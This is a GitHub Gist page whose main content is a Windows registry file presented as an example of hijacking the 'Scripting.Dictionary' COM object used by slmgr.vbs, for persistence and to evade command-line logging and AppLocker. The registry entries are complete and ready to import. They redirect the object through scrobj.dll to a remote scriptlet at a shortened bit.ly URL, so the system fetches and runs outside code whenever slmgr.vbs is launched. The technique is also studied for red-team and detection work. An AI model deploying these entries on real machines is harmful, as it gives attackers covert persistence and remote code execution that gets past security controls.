-
-
Save decay88/9b294fb09b9908f746e50c860362b9f4 to your computer and use it in GitHub Desktop.
Example presenting how to Hijack COM object named "Scripting.Dictionary" used by slmgr.vbs (CreateObject("Scripting.Dictionary")) in order to obtain persistence or evade Command Line logging and AppLocker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
@="" | |
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] | |
@="Scripting.Dictionary" | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InProcServer32] | |
@="C:\\Windows\\system32\\scrobj.dll" | |
"ThreadingModel"="Apartment" | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] | |
@="Scripting.Dictionary" | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] | |
@="https://bit.ly/31nEr1c" | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID] | |
@="Scripting.Dictionary" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment